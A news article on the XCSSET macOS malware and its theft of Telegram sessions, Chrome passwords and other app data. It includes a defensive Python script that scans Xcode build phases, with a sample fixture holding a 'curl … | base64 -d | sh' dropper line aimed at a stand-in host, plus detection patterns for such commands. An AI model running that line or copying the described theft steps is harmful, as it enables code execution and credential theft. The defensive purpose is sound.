macOS Malware XCSSET

24th July 2021, Kathmandu

Google Chrome and Telegram are the latest targets of the XCSSET macOS malware

Malware targeting the macOS operating system has been updated again, adding capabilities to collect and exfiltrate sensitive data stored by a range of applications, including Google Chrome and Telegram, as its authors continue to refine their tactics.

XCSSET was discovered in August 2020, when it was found to use an unusual distribution method to target Mac developers: it injected malicious payloads into Xcode projects, so that the payload ran whenever the project was built in the Xcode IDE.
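A practical check a Mac developer can run against their own repositories is to look for build-phase scripts that behave like droppers. The following Python script is an added example, not code from the article or from Trend Micro: it parses an Xcode project.pbxproj, pulls out every Run Script build phase (PBXShellScriptBuildPhase) and flags scripts that match simple dropper indicators. It assumes the injection takes the form of a Run Script phase; the indicator list and the sample project text are constructed for the demo and are not a published XCSSET signature.

```python
"""Audit an Xcode project.pbxproj for suspicious Run Script build phases.

Added example (not the page's or Trend Micro's code). Assumes the injected
payload is delivered as a PBXShellScriptBuildPhase; indicators below are
illustrative, not a published signature.
"""
import re

# Indicators a build script rarely has a legitimate reason to contain.
# Each is (regex, human-readable reason). Assumed for this example.
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", "downloads and pipes into a shell"),
    (r"\bbase64\s+(-d|--decode|-D)\b", "decodes a base64 blob"),
    (r"\beval\b", "evaluates dynamically built commands"),
    (r"\bosascript\b", "runs AppleScript from a build step"),
    (r"\bpython[23]?\s+-c\b", "runs inline Python from a build step"),
]

# A pbxproj object: 24-hex-digit id, optional /* comment */, then a brace body.
# Build-phase bodies contain parentheses but never nested braces, so [^{}]* is safe.
OBJECT_RE = re.compile(r"([0-9A-F]{24})\s*(?:/\*.*?\*/)?\s*=\s*\{([^{}]*)\}", re.S)
ISA_RE = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;")
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)

_ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}


def unescape(s):
    """Undo pbxproj string escaping in a single pass (so '\\\\n' stays a literal backslash-n)."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def find_build_scripts(pbxproj_text):
    """Yield (object_id, script_text) for every PBXShellScriptBuildPhase in the project."""
    for m in OBJECT_RE.finditer(pbxproj_text):
        obj_id, body = m.group(1), m.group(2)
        if not ISA_RE.search(body):
            continue
        sm = SCRIPT_RE.search(body)
        if sm:
            yield obj_id, unescape(sm.group(1))


def audit(pbxproj_text):
    """Return [(object_id, [reasons], script)] for every build script hitting an indicator."""
    findings = []
    for obj_id, script in find_build_scripts(pbxproj_text):
        reasons = [reason for pattern, reason in SUSPICIOUS if re.search(pattern, script, re.M)]
        if reasons:
            findings.append((obj_id, reasons, script.strip()))
    return findings


# Constructed sample: one benign linter phase and one dropper-style phase.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
	archiveVersion = 1;
	objectVersion = 50;
	objects = {
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4E5F60718293A4B5C /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# SwiftLint\nif which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		0F1E2D3C4B5A69788796A5B4 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s http://attacker.invalid/x | base64 -d | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
	};
	rootObject = C0FFEE0000000000000000AA /* Project object */;
}
'''

if __name__ == "__main__":
    for obj_id, reasons, script in audit(SAMPLE_PBXPROJ):
        print(f"[!] build phase {obj_id}: {', '.join(reasons)}")
        print("    " + script.replace("\n", "\n    "))
```

Run it against a real project with `audit(open("MyApp.xcodeproj/project.pbxproj").read())`. The indicator list is deliberately short and will miss a payload that hides behind an innocuous-looking script path, so treat a clean result as "nothing obvious" rather than "nothing injected", and diff project.pbxproj against version control whenever a build phase you did not add appears.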

In early April this year, XCSSET received an update that let it attack macOS 11 Big Sur and Macs running on the M1 chip by circumventing the new security policies Apple introduced in the latest operating system.

“The malware downloads its own open tool from its C2 server, which has a temporary signature, and if it is on macOS version 10.15 or earlier, it will continue to use the system’s built-in open command to run the application,” Trend Micro researchers noted at the time.

Now, according to a new write-up published by the same company on Thursday, XCSSET has been found running a malicious AppleScript file that compresses the folder containing Telegram’s data (“~/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram”) into an archive. The archive is then uploaded to a remote server under the attacker’s control. Because Telegram keeps its session state in that sandbox directory, copying the folder to another machine is enough for the threat actor to access the victim’s account.

In the case of Google Chrome, the malware attempts to steal the passwords saved in the browser. Chrome encrypts these with a master key, known as the “safe storage key” (the “Chrome Safe Storage” Keychain item), so the malware presents a fake dialog box to trick the user into granting it root privileges, abuses those privileges to run an unauthorized shell command that retrieves the master key from the Keychain, and then decrypts the stored passwords and exfiltrates them to its server.

In addition to Chrome and Telegram, XCSSET can also steal data from other applications, including Evernote, Opera, Skype, WeChat, and Apple’s Contacts and Notes apps, by retrieving valuable information from their respective sandbox directories.
